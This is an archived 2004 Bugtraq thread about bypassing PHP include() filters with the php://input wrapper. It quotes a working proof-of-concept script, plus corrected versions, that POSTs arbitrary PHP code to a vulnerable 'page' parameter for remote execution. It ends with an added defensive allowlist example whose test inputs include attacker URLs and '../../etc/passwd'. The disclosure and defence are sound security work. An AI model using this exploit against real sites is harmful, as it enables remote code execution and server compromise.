Re: [PHP] include() bypassing filter with php://input

From: bugtraq subscriber (bugtraq_at_theorb.net)
Date: 05/28/04

  • Next message: Luca Falavigna: "Possible bug in PHPNuke and other CMS"
    Date: Fri, 28 May 2004 13:22:24 -0700
    To: bugtraq@securityfocus.com
    
    

    clez wrote:
    > Hi there!
    >
    > I use PHP 4.3.5 and tried this "proof of concept". I assumed that the
    > form attribute "methode" is a typing mistake and adapted the exploit to
    > get it working under a PHP 4.3.x default configuration (it's kind of
    > paradoxical to use autoglobals in an exploit that aims to secure other
    > products).
    >
    > But even this adapted version (see below) does not show anything on
    > execution.

    Hi all,

    There's another typo in there.

          $message = "POST /".$_POST['file']."php://input HTTP/1.1\r\n";

       should be

          $message = "POST /".$_POST['file']." php://input HTTP/1.1\r\n";

    On my LAMP system the script performs as claimed.

    :m)

    >
    > This exploit seems to rely on an exploitable web service that gets paths
    > to include files from a GET variable named "page".
    >
    > So this seems to me like a (fixed/changed) bug at the single service
    > "www.exemple.com" (not to be mixed up with www.example.com from RFC
    > 2606) and not a general PHP issue.
    >
    > ############ snippet start ############
    > <form method="post" >
    > target server : <input type="text" name="server"/><br/>
    > file : <input type="text" name="file" /><br/>
    > exec : <input type="text" name="cmd" /><br/>
    > <input type="submit" value="send" />
    > </form>
    > <?php
    > if(is_array($_POST) && isset($_POST['cmd']) && isset($_POST['server'])
    > && isset($_POST['file'])){
    > $message = "POST /".$_POST['file']."php://input HTTP/1.1\r\n";
    > $message .= "Accept: */*\r\n";
    > $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    > $message .= "Accept-Encoding: deflate\r\n";
    > $message .= "Host: ".$_POST['server']."\r\n";
    > $message .= "Content-length: ".strlen($_POST['cmd'])."\r\n";
    > $message .= "\r\n";
    > $message .= urlencode($_POST['cmd'])."\r\n";
    > $fd = fsockopen($_POST['server'],80);
    > fputs($fd,$message);
    > while(!feof($fd)) {
    > echo fgets($fd,1280);
    > }
    > fclose($fd);
    > }
    > ?>
    > ############ snippet end ############
    >
    >
    > On Fri, 2004-05-28 at 06:51, Keary Suska wrote:
    >
    >>What exactly does your "proof of concept" do? I tried this on my system with
    >>PHP 4.34.x--which, by the way, is when support for php://input began, *not*
    >>3.0.13--and nothing happened whatsoever. Where's the proof?
    >>
    >>on 5/27/04 3:07 AM, lostnoobs@security-challenge.com purportedly said:
    >>
    >>
    >>>
    >>>Information:
    >>>°°°°°°°°°°°°°°
    >>>Website : http://www.php.net
    >>>Version : PHP 3.0.13 =>
    >>>Problem : Include() bypassing filter
    >>>
    >>>
    >>>Proof of concept:
    >>>°°°°°°°° Exploit °°°°°°°°°
    >>><------------ cut here ---------------->
    >>><form action="" methode="post" >
    >>>target server : <input type="text" name="server" ><br>
    >>>file : <input type="text" name="file" ><br>
    >>>exec : <input type="text" name="cmd" ><br>
    >>><INPUT type="submit" value="send">
    >>></form>
    >>>
    >>><?
    >>>if($cmd){
    >>>$message = "POST /".$file."php://input HTTP/1.1\r\n";
    >>>$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
    >>>application/x-shockwave-flash, */*\r\n";
    >>>$message .= "Accept-Language: fr\r\n";
    >>>$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    >>>$message .= "Accept-Encoding: deflate\r\n";
    >>>$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
    >>>MyIE2)\r\n";
    >>>$message .= "Host: ".$server."\r\n";
    >>>$message .= "Content-length: ".strlen( $cmd )."\r\n";
    >>>$message .= "Connection: Keep-Alive\r\n";
    >>>$message .= "Cache-Control: no-cache\r\n";
    >>>$message .= "\r\n";
    >>>$message .= $cmd."\r\n";
    >>>$fd = fsockopen( $server, 80 );
    >>>fputs($fd,$message);
    >>>while(!feof($fd)) {
    >>>echo fgets($fd,1280);
    >>>}
    >>>fclose($fd);
    >>>}
    >>>?>
    >>><------------ cut here ---------------->
    >>>
    >>>target server = "www.exemple.com"
    >>>file = "index.php?page="
    >>>exec = "<? phpinfo(); ?>"
    >>>
    >>>Explanation
    >>>°°°°°°°°°°°°°°
    >>>You can bypass filter protection that parses for http:// or ftp:// ...
    >>>"php://input" allows you to put data into the function include() by sending a
    >>>request with PHP code in the POST method.
    >>>
    >>>
    >>>For More details :
    >>>°°°°°°°°°°°°°°
    >>>http://fr2.php.net/manual/en/wrappers.php.php
    >>>irc.fr.worldnet.net #s-c
    >>>
    >>>Nourredine Himeur
    >>>
    >>>www.security-challenge.com
    >>>
    >>>This vulnerability was found by Slythers but he's too shy to publish the vuln
    >>>;)
    >>>
    >>>greetz : mum , daddy , tcpteam , Nyx
    >>>
    >>>
    >>>
    >>
    >>
    >>Keary Suska
    >>Esoteritech, Inc.
    >>"Leveraging Open Source for a better Internet"
    >>
    >
    >
    >
    >
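The thread turns on one point: a script that passes a request parameter to include() and only denylists "http://" and "ftp://" will happily include "php://input", which makes the POST body executable code. The script below is an added example written for this archive page, not code from any poster; it shows the denylist pattern the advisory is bypassing beside an allowlist dispatch that never lets the request value become a path or wrapper name. The page names, file paths and sample inputs are constructed for the demonstration.

```php
<?php
// Added example, not from the thread. Contrasts a denylist filter of the kind
// "php://input" slips past with an allowlist include() dispatch.

// Vulnerable pattern: the "page" value reaches include() after a filter that
// only recognises two URL schemes. "php://input" is neither, so it passes,
// and include() then executes whatever the client put in the POST body.
function denylist_filter_allows(string $page): bool
{
    foreach (['http://', 'ftp://'] as $prefix) {
        if (stripos($page, $prefix) === 0) {
            return false;
        }
    }
    return true;
}

// Hardened pattern: the request value is only ever a lookup key into a fixed
// map of files. Wrapper names, relative paths and "../" have no meaning here
// because the value is never concatenated into the include() argument.
// The page names and paths are constructed for this example.
const PAGES = [
    'home'    => 'pages/home.php',
    'contact' => 'pages/contact.php',
];

function resolve_page($page): ?string
{
    if (!is_string($page)) {      // e.g. page[]=x arrives as an array
        return null;
    }
    return PAGES[$page] ?? null;
}

if (PHP_SAPI === 'cli') {
    // Worked run over constructed inputs: the denylist lets the wrapper
    // through, the allowlist rejects everything that is not a known key.
    $inputs = ['home', 'http://attacker.example/x.txt', 'php://input', '../../etc/passwd'];
    foreach ($inputs as $in) {
        printf("%-32s denylist: %-8s allowlist: %s\n",
            $in,
            denylist_filter_allows($in) ? 'ALLOWED' : 'blocked',
            resolve_page($in) ?? 'rejected');
    }
} else {
    // Web dispatch: unknown keys get a 404 and never reach include().
    $file = resolve_page($_GET['page'] ?? 'home');
    if ($file === null) {
        http_response_code(404);
        exit('no such page');
    }
    include __DIR__ . '/' . $file;
}
```

Run it from the command line (`php example.php`) to see the two filters side by side. The allowlist is the fix that holds regardless of which wrapper an attacker names; as a second layer, PHP 5.2 and later ship `allow_url_include=Off`, which also refuses include() of php://input, but that setting did not exist for the 4.3.x builds discussed in this thread, so the code-level fix is the one that applies to them.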

